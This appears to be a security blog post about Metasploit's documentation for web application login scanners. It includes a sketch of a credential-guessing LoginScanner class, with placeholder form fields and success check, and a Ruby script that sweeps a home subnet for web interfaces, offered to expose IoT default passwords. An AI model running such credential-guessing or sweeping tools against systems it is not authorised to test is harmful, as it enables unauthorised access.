 

Using his recent Symantec Gateway module as an example, Wei put together the One True Way for writing web application login scanners. This is a critical chunk of documentation, since it's a great HOWTO on quickly and reliably figuring out the login sequence for pretty much any normal web application.
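
To give a flavor of what that HOWTO describes: the protocol logic lives in a LoginScanner class, and the auxiliary module mostly just feeds it credentials. Here's a rough sketch of such a class; the class layout and the Result/Status plumbing follow the framework's LoginScanner API, while the gateway name, URI, form fields, and success check are placeholders rather than the real Symantec Gateway logic:

require 'metasploit/framework/login_scanner/http'

module Metasploit
  module Framework
    module LoginScanner
      # Hypothetical scanner for an imaginary web gateway
      class ExampleGateway < HTTP
        DEFAULT_PORT  = 443
        PRIVATE_TYPES = [ :password ]

        # Attempt a single Metasploit::Framework::Credential and return a Result
        def attempt_login(credential)
          result_opts = {
            credential:   credential,
            host:         host,
            port:         port,
            protocol:     'tcp',
            service_name: 'http'
          }

          res = send_request(
            'method'    => 'POST',
            'uri'       => '/login.php',                       # placeholder
            'vars_post' => {
              'USERNAME' => credential.public,
              'PASSWORD' => credential.private
            }
          )

          if res && res.code == 302                            # placeholder check
            result_opts[:status] = Metasploit::Model::Login::Status::SUCCESSFUL
            result_opts[:proof]  = res.headers['Location']
          else
            result_opts[:status] = Metasploit::Model::Login::Status::INCORRECT
          end

          Result.new(result_opts)
        end
      end
    end
  end
end

The point of this split is that the protocol details live in one place instead of being duplicated in every module that wants to guess credentials for the same application.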

 

Looking ahead to 2016

Why am I devoting a whole HaXmas post to this corner of 2015 development work? Well, I don't know if you've noticed, but we've been deluged with a massive pile of Internet of Things gear that (a) offers little in the way of built-in security, (b) offers a lot in the way of default passwords, and (c) is nearly always managed via some custom web application front end. Oh, and (d): I don't -- can't -- imagine a future where we will have fewer of these things.

 

Today, we have some solid documentation on writing web application login scanners, and a fistful of example implementations. Add the fact that most of these devices never get their default passwords changed, and we have a pretty great chance of guessing correctly if we're on the same network and willing to make a few attempts. As an added bonus, there's now a whole bunch more of these IoT devices that just got unboxed, powered on, and connected to the network on Christmas morning.

 

We really do need to get ahead of this problem, and about the best way I can think of to tackle it is to actively explore this space in an open source environment like the Metasploit Framework. So, while you're enjoying this holiday season, maybe take an hour or two to audit your own local home network, see how many web applications you can find, and consider kicking out a corresponding Metasploit module in order to highlight the risk of factory default passwords on these devices.
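
If you want a fast first pass at that audit, even a few lines of Ruby will surface most of the web interfaces on a typical home network. A rough sketch; the subnet and port list are assumptions you'll want to adjust for your own network, and it only reports whatever answers HTTP:

#!/usr/bin/env ruby
# Very rough sweep of a home /24 for listening web interfaces.
# Prints the HTTP status and Server header of anything that answers.
require 'net/http'
require 'openssl'

SUBNET = '192.168.1'            # adjust for your network
PORTS  = [80, 443, 8080, 8443]  # common web interface ports

(1..254).each do |i|
  host = "#{SUBNET}.#{i}"
  PORTS.each do |port|
    begin
      http = Net::HTTP.new(host, port)
      http.use_ssl      = [443, 8443].include?(port)
      http.verify_mode  = OpenSSL::SSL::VERIFY_NONE if http.use_ssl?
      http.open_timeout = 1
      http.read_timeout = 2
      res = http.get('/')
      puts "#{host}:#{port} -> HTTP #{res.code}, Server: #{res['Server']}"
    rescue StandardError
      # closed port, timeout, or not speaking HTTP; skip it
    end
  end
end

Anything that turns up with a recognizable vendor login page is a good candidate for the default-credential treatment described above.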
